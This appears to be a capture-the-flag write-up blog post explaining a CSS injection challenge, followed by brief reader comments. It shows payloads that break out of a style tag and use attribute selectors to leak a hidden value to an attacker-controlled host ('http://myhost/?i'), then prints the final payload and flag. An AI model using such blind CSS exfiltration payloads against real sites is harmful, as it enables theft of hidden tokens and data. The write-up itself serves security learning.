Challenge:
The challenge is about CSS Injection, when you click Share your button!, you will post to push.php something like this
csscode={width:+100px;+font-size:+100px;+height:+1px;+line-height:+1px;+border-width:+1px;}&submit=Share+your+button!
Wow, its CSS! I change something in {} to recheck
csscode={color:red;}&submit=Share+your+button!
The color of text turn red.
Let’s view the source code:
Notice 1:
<style>#button {color:red}</style>
so our input will be placed after #button, let make some injection and see if it would affect
csscode=</style><style>#button {color:yellow;}&submit=Share+your+button!
Well the text color turn to yellow.
Notice 2:
<!-- Admin only ...
<span value="secret"></span>
-->
Obviously, we need to leak “secret”, it is flag of this challenge. How to?
Let me talk about CSS
CSS stands for Cascading Style Sheets and it’s used to customize how websites look.
Here the CSS syntax:
selector { property1: value1; property2: value2; }
so if we want to customize span tag, just write:
span { color:red }
But how to select value attribute? Here the solution:
so our payload become
span[value]{color:red}
I decide to do some trick, called blind CSS injection:
span[value$='1']{content: url('http://myhost/?i')}
If the last char of “secret” is ‘1’, then it loads my host, and i’ll know, if not, nothing happen
Move on
span[value$='41']{content: url('http://myhost/?i')}
If the last two chars of “secret” is ’41’, then it loads my host, and i’ll know, if not, nothing happen
Combine 2 notice, final payload is:
csscode=</style><style>span[value='662f32aeb6041954dfac4a83523bc3eae72b5441'] {content: url('http://myhost/?i')}&submit=Share%2Byour%2Bbutton!
Flag: 662f32aeb6041954dfac4a83523bc3eae72b5441
Sorry for my bad engrish
Tsu BlogS ٩(^‿^)۶ 
Ok, I forgive your engrish.
LikeLike
thank u 😥
LikeLike
Pingback: WhiteHat Contest 11 – Ultimate Design Tool | BabyPhD CTF Team